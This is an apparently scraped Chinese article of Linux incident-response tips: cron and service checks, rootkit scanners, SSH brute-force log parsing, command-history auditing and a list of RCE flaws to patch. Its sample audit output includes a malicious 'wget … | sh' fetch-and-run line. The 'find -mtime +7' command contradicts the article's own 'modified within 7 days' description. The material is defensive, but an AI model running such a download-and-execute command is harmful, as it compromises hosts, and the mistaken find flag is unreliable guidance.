文章插图
查看anacron异步定时任务:cat/etc/anacrontab
文章插图
检查是否存在可疑服务
枚举主机所有服务 , 查看是否有恶意服务:
service--status-all 检查系统文件是否被劫持
枚举系统文件夹的文件 , 按修改事件排序查看7天内被修改过的文件:
find /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ -type f -mtime +7 | xargs ls -la 检查是否存在病毒守护进程
监控守护进程的行为:lsof-p[pid]
文章插图
strace-tt-T -etrace=all-p$pid 扫描是否存在恶意驱动
枚举/扫描系统驱动:lsmod
安装chkrootkit进行扫描:
wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gztar zxvf chkrootkit.tar.gzcd chkrootkit-0.52make sense./chkrootkit 安装rkhunter进行扫描:
Wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz
tar -zxvf rkhunter-1.4.4.tar.gz
cd rkhunter-1.4.4
./installer.sh --install
rkhunter -c
最后一个环节往往是大家比较容易遗忘的 , Linux平台下90%的病毒是通过网络传播感染的 , 所以 , 你的主机之所以会感染病毒 , 大部分原因也是因为Web安全防护不够 , 赶紧检查一下 。
修改SSH弱密码
查询log主机登陆日志:
grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}' 定位有爆破的源IP:
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c 爆破日志的用户名密码:
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1n";}'|uniq -c|sort -nr SSH爆破是Linux病毒最常用的传播手段 , 若存在弱密码的主机很容易被其他感染主机SSH爆破成功 , 从而再次感染病毒 。
从0开始学习大数据开发技术 , 加米谷大数据培训机构 , 理论+实践小班教学 , 数据分析与挖掘零基班11月16日即将开课 , 预报名可享优惠活动!?
添加命令审计
为历史的命令增加登录的IP地址、执行命令时间等信息:
[1]保存1万条命令:
sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile [2]在/etc/profile的文件尾部添加如下行数配置信息:
USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'` if [ "$USER_IP" = "" ] then USER_IP=`hostname` fi export HISTTIMEFORMAT="%F %T $USER_IP `whoami` " shopt -s histAppend export PROMPT_COMMAND="history -a" [3]让配置生效:
source /etc/profile 生成效果:
762019-10-2817:05:34113.110.229.230 wget -q -T180 -O-) | sh 打上常见Web漏洞补丁
structs2系列RCE漏洞 thinkphp5.XRCE漏洞 redis未授权访问漏洞 ConfluenceRCE漏洞(CVE_2019_3396) DrupalRCE漏洞(CVE-2018-7600) ThinkPHPRCE漏洞(CVE-2019-9082) 结尾
Linux平台下的恶意软件威胁以僵尸网络蠕虫和挖矿病毒为主 , 由于Linux大多作为服务器暴露在公网 , 且Web应用的漏洞层出不穷 , 所以很容易被大范围入侵 , 如常见的病毒:DDG、systemdMiner、BillGates、watchdogs、XorDDoS , 在很多Linux上都有 。大家要养成不使用弱密码、勤打补丁的好习惯 。
【超全面的Linux应急响应技巧】
推荐阅读
![[达达带你看世界]东北人最下饭的十道小咸菜,你吃过吗?贼下饭!想想都流口水!](http://ttbs.guangsuss.com/image/7bdd22d439da728f277b7b372786b133)
![[泰国资讯指南]尚泰告知商户书信:准备5月1日开门营业](https://imgcdn.toutiaoyule.com/20200420/20200420154018099232a_t.jpeg)
- Kali Linux 2019.3版本开箱配置
- 超全苹果电脑入门指南
- 在linux服务器上如何下载ftp上面的文件?解决各类问题!lftp详解
- 除了银河系的星星以外,河外星系 地球表面的大部分都被海洋覆盖,生命也诞生于海洋之中
- 历史金字塔里面的木乃伊是什么样子的 木乃伊放在金字塔哪里
- 桌面图标都不见了怎么办?
- 吃到汤圆里的硬币代表着什么,吃到汤圆里面的硬币好不好
- 在 Linux 上用 strace 来理解系统调用
- 女儿流鼻血是怎么回事?
- 柚子皮泡水是用外皮还是里面的 柚子皮泡水用哪个部位泡